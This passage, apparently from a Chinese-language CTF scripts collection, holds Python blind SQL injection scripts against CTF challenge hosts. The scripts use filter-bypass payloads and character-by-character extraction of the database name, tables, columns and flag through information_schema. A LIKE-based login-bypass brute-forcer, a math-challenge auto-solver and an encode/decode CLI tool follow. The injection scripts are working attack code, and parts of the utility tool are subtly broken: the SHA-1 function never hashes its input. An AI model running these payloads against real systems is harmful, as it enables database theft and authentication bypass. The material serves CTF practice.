            res = res.replace(' ', chr(0x0a))
            key = {'id': res}
            r = requests.post(url, data=key).text
            print("......%s.........%s........." % (i, j))
            if str in r:
                column += j
                break
    print(column)
    print("end!")


def get_value():
    flag = ""
    print("start")
    for i in range(1, 20):
        for j in guess:
            res = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (i, j)
            res = res.replace(' ', chr(0x0a))
            key = {'id': res}
            r = requests.post(url, data=key).text
            'print("........%s..........%s........"%(i,j))'
            if str in r:
                flag += j
                print(flag)
                break
    print(flag)
    print("end!")


get_ziduan_length('fiag')

sql bool爆破自動指令碼

import requests


def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])


def boom():
    url = 'http://7e14e5869b3e4d77a8e5ef931f13dafed89ecee1787c4d59.game.ichunqiu.com/index.php'
    s = requests.session()
    dic = "[email protected]#$%^&*()_+{}-="  # 名字猜解的字元範圍
    right = 'password error!'
    error = 'username error!'

    lens = 0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"
        data = {'username': payload, 'password': 1}
        r = s.post(url, data=data).content.decode()
        if error in r:
            lens = i
            break
        i += 1
        pass
    print("[+]length(database()): %d" %(lens))

    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) + ",1))=" + str(ord(c)) + "#"
            data = {'username': payload, 'password': 1}
            r = s.post(url,data=data).content.decode()
            if right in r:
                strs = strs + c
                print(strs)
                break
        pass
    pass
    print("[+]database():%s" %(strs))

    lens=0
    i = 1
    while True:
        payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=" \
                                      "database() limit 0,1)>" + str(i) + "#"
        data = {'username': payload, 'password': 1}
        r = s.post(url,data=data).content.decode()
        if error in r:
            lens = i
            break
        i+=1
        pass
    print("[+]length(table): %d" %(lens))

    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_" \
                                          "schema=database() limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
            data = {'username': payload, 'password': 1}
            r = s.post(url, data=data).content.decode()
            if right in r:
                strs = strs + c
                print(strs)
                break
        pass
    pass
    print("[+]table_name:%s" %(strs))
    tablename = '0x' + str_to_hex(strs)
    table_name = strs

    lens=0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where" \
                                      " table_name = " + tablename + " limit 0,1)>" + str(i) + "#"
        data = {'username': payload, 'password': 1}
        r = s.post(url,data=data).content.decode()
        if error in r:
            lens = i
            break
        i += 1
        pass
    print("[+]length(column): %d" %(lens))

    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
            data = {'username': payload, 'password': 1}
            r = s.post(url,data=data).content.decode()
            if right in r:
                strs = strs + c
                print(strs)
                break
        pass
    pass
    print("[+]column_name:%s" %(strs))
    column_name = strs

    num=0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
        data = {'username': payload, 'password': 1}
        r = s.post(url, data=data).content.decode()
        if error in r:
            num = i
            break
        i+=1
        pass
    print("[+]number(column): %d" %(num))

    lens=0
    i = 0
    while True:
        payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
        data = {'username': payload, 'password': 1}
        r = s.post(url, data=data).content.decode()
        if error in r:
            lens = i
            break
        i+=1
        pass
    print("[+]length(value): %d" %(lens))

    i=1
    strs=''
    for i in range(lens+1):
        for c in dic:
            payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
            data = {'username': payload, 'password': '1'}
            r = s.post(url, data=data).content.decode()
            if right in r:
                strs = strs + c
                print(strs)
                break
        pass
    pass
    print("[+]flag:%s" %(strs))


if __name__ == '__main__':
    boom()
    print('Finish!')

sql 使用like暴力猜解

import string
import requests


url = 'http://4a899a854a124b3ba03b32764e949ce4d677a918742d4c56.game.ichunqiu.com/Challenges/index.php'
headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
payloads = string.ascii_letters + string.digits
temp = ''
for i in range(40):
    print("hello")
    for p in payloads:
        payload = temp + p
        name = "admin' or user_n3me like '{}%' ;#".format(payload)
        data = dict(username=name, passwrod='test')
        res = requests.post(url, headers=headers, data=data)
        if (len(res.content) == 12):
            temp = temp + p
            print(temp.ljust(32, '.'))
            break

內容匹配與提交

這是那個要求快速計算加減乘除然後上交的,我們可能還會遇到其他的不同要求的,要學會使用正則表示式進行匹配,然後進行字串操作提取關鍵資訊。

import requests
import re


url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
respon = requests.get(url)
# print(respon.content)
# rmatch = re.compile("[0-9]{2,5}")

# #   2559*81551+1066*(2559+81551)
# findall 和 match的區別 match是匹配不上的 因為是從源頭匹配 匹配不到就沒有結果
es = re.findall(r"\d{2,6}", respon.content.decode('utf-8'))
result = int(es[0])*int(es[1])+int(es[2])*(int(es[3])+int(es[4]))
# print(result)

# 第二次提交資料 注意提交資料也是鍵值對形式
date = {"v": str(result)}
header = {'Cookie': 'PHPSESSID=356ee82e732bcef813ac0b37ba8fddf5'}
response = requests.post(url, headers=header, data=date)
print(response.content.decode('utf-8'))
import requests
import re


url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
header = {'Cookie': 'PHPSESSID=356ee82e732bcef813ac0b37ba8fddf5'} #填入自己的cookie

contents = requests.get(url, headers = header).content.decode('utf-8')
matches = re.search("(.+)=<(input)", contents)

data = {'v': str(eval(matches.group(1)))}
contents = requests.post(url, headers=header, data=data).content.decode('utf-8')

matches = re.search("<body>(.*)</body>", contents)
print(matches.group(1))

常用CTF工具

 這是網上一個大佬寫的,主要就是各種加密解密的指令碼,但是大多數都可以使用網上線上的解碼,不過就作為一個擴充套件吧。

# -*- coding:utf-8 -*-
import hashlib
import base64
import urllib
import argparse

"""

        名字:CTF之常用工具彙總

        作者:白貓

        時間:2018-3-22

        QQ :1058763824


"""


def menu():
    usage = """
       -m      MD5 encryption
       -s      SH1 encryption
       -h      Show help information
       -b64    Base64 encode
       -b32    Base32 encode
       -b16    Base16 encode
       -db64   Base64 decode
       -db32   Base32 decode
       -db16   Base16 decode
       -urlen  URL encode
       -urlde  URL decode
       -bin    Binary To Decimal
       -octal  Octal  to Decimal
       -hex    Hexadecimal to Decimal
       -dbin   Decimal To Binary 
       -doctal Decimal to Octal 
       -dhex   Decimal to Hexadecimal
       -ord    Letter To ASCII           Example  -ord asdfasfa      -ord='dfafs afasfa  asfasf'
       -chr    ASCII  To Letters         Example  -chr 105           -chr = '102 258 654'


    """

    # 在使用ord 和chr命令的時候要注意如果輸入的字元和數字不包含空格則直接實用例子前面的命令如果包含空格則使用後面的命令

    parser = argparse.ArgumentParser()

    parser.add_argument('-m', dest='md', help='MD5 encryption')

    parser.add_argument('-s', dest='sh', help='SH1 encryption')

    parser.add_argument('--h', action="store_true", help='Show help information')

    parser.add_argument('-b64', dest='b64', help='Base64 encode')

    parser.add_argument('-b32', dest='b32', help='Base32 encode')

    parser.add_argument('-b16', dest='b16', help='Base16 encode')

    parser.add_argument('-db64', dest='db64', help='Base64 decode')

    parser.add_argument('-db32', dest='db32', help='Base32 decode')

    parser.add_argument('-db16', dest='db16', help='Base16 decode')

    parser.add_argument('-urlen', dest='urlen', help='URL encode')

    parser.add_argument('-urlde', dest='urlde', help='URL decode')

    parser.add_argument('-bin', dest='bin', help='Binary To Decimal')

    parser.add_argument('-octal', dest='octal', help='Octal  to Decimal')

    parser.add_argument('-hex', dest='hex', help='Hexadecimal to Decimal')

    parser.add_argument('-dbin', dest='dbin', help='Decimal To Binary ')

    parser.add_argument('-doctal', dest='doctal', help='Decimal to Octal ')

    parser.add_argument('-dhex', dest='dhex', help='Decimal to Hexadecimal')

    parser.add_argument('-ord', dest='ord',
                        help="Letter To ASCII               Example  -ord aaaaaa  , -ord=\"aaa aaa\"")

    parser.add_argument('-chr', dest='chr',
                        help="ASCII  To Letter              Example  -chr 105     ,  -chr = \"101 101\" ")

    options = parser.parse_args()

    if options.md:

        s = options.md

        md5(s)

    elif options.sh:

        s = options.sh

        sh1(s)

    elif options.b64:

        s = options.b64

        stringToB64(s)

    elif options.b32:

        s = options.b32

        stringToB32(s)

    elif options.b16:

        s = options.b16

        stringToB16(s)

    elif options.db64:

        s = options.db64

        b64ToString(s)

    elif options.db32:

        s = options.db32

        b32ToString(s)

    elif options.db16:

        s = options.db16

        b16ToString(s)

    elif options.urlen:

        s = options.urlen

        urlEncode(s)

    elif options.urlde:

        s = options.urlde

        urlDecode(s)

    elif options.bin:

        s = options.bin

        binToDec(s)

    elif options.octal:

        s = options.octal

        octToDec(s)

    elif options.hex:

        s = options.hex

        hexToDec(s)

    elif options.dbin:

        s = options.dbin

        decToBin(s)

    elif options.doctal:

        s = options.doctal

        decToOct(s)

    elif options.dhex:

        s = options.dhex

        decToHex(s)

    elif options.doctal:

        s = options.doctal

        decToOct(s)

    elif options.dhex:

        s = options.dhex

        decToHex(s)

    elif options.ord:

        s = options.ord

        lettToASCII(s)

    elif options.chr:

        s = options.chr

        asciiToLett(s)



    else:

        helpInfo()


def helpInfo():
    print("""
-m MD5 encryption
       -s      SH1 encryption
       --h      Show help information
       -b64    Base64 encode
       -b32    Base32 encode
       -b16    Base16 encode
       -db64   Base64 decode
       -db32   Base32 decode
       -db16   Base16 decode
       -urlen  URL encode
       -urlde  URL decode
       -bin    Binary To Decimal
       -octal  Octal Decimal to Decimal
       -hex    Hexadecimal to Decimal
       -dbin   Decimal To Binary 
       -doctal Decimal to Octal 
       -dhex   Decimal to Hexadecimal
       -ord    Letter To ASCII  attention  Example  -ord asdfasfa      -ord="dfafs afasfa  asfasf"
       -chr    ASCII  To Letters           Example  -chr 105           -chr = "102 258 654"
""")


# 進行MD5加密

def md5(s):
    original = s

    md = hashlib.md5()

    s = s.encode(encoding='utf-8')

    md.update(s)

    print('Original:' + original)

    print('Md5 Encryption:' + md.hexdigest())


# 進行sh1加密

def sh1(s):
    original = s

    sh = hashlib.sha1()

    s = s.encode(encoding='utf-8')

    print('Original:' + original)

    print('SH1 Encryption:' + sh.hexdigest())


# 將字串轉換為base64編碼格式

def stringToB64(s):
    encode = base64.b64encode(s)

    print('Original:' + s)

    print('Base64 encode:' + encode)


# 將base64編碼格式轉化為正常的字元型別

def b64ToString(s):
    decode = base64.b64decode(s)

    print('Base64:' + s)

    print('Base64 decode:' + decode)


# 將字串轉為b32編碼格式

def stringToB32(s):
    encode = base64.b32encode(s)

    print('Original:' + s)

    print('Base32 encode:' + encode)


# 將base32編碼格式轉化為正常的字元型別

def b32ToString(s):
    decode = base64.b32decode(s)

    print('Base32:' + s)

    print('Base32 decode:' + decode)


# 將字串轉為base16編碼格式

def stringToB16(s):
    encode = base64.b16encode(s)

    print('Original:' + s)

    print('Base16 encode:' + encode)


# 將base16編碼格式轉化為正常的字元型別

def b16ToString(s):
    decode = base64.b16decode(s)

    print('Base16:' + s)

    print('Base16 decode:' + decode)


# 進行url編碼

def urlEncode(s):
    encode = urllib.quote(s)

    print('Original:' + s)

    print('URL encode:' + encode)


# 進行url編碼

def urlDecode(s):
    decode = urllib.unquote(s)

    print('URL encode:' + s)

    print('URL decode:' + decode)


# 將二進位制轉化為十進位制

def binToDec(s):
    result = int(s, 2)

    print('Binary :' + str(s))

    print('Decimal :' + str(result))


# 將八進位制轉化為十進位制

def octToDec(s):
    result = int(s, 8)

    print('Octal :' + str(s))

    print('Decimal :' + str(result))


# 將十六進位制轉化為十進位制

def hexToDec(s):
    result = int(s, 16)

    print('Hex :' + str(s))

    print('Decimal :' + str(result))


# 將十進位制轉化為二進位制

def decToBin(s):
    s = int(s)

    result = bin(s)

    print('Decimal:' + str(s))

    print('Binary:' + str(result))


# 將十進位制轉化為八進位制

def decToOct(s):
    s = int(s)

    result = oct(s)

    print('Decimal :' + str(s))

    print('Octal :' + str(result))


# 將十進位制轉化為十六進位制

def decToHex(s):
    s = int(s)

    result = hex(s)

    print('Decimal :' + str(s))

    print('Hex :' + str(result))


# 將字母轉化為對應的ASCII

def lettToASCII(s):
    print('Letters:' + s)

    result = ''

    for i in s:
        result = result + str(ord(i)) + ' '

    print('ASCII  :' + result)


# 將ASCII轉化為對應的字母以及字元


def asciiToLett(s):
    list = s.split(' ')

    result = ''

    print('ASCII    :' + s)

    for i in list:
        i = int(i)

        result = result + chr(i)

    print('Letters  :' + result)


if __name__ == '__main__':
    menu()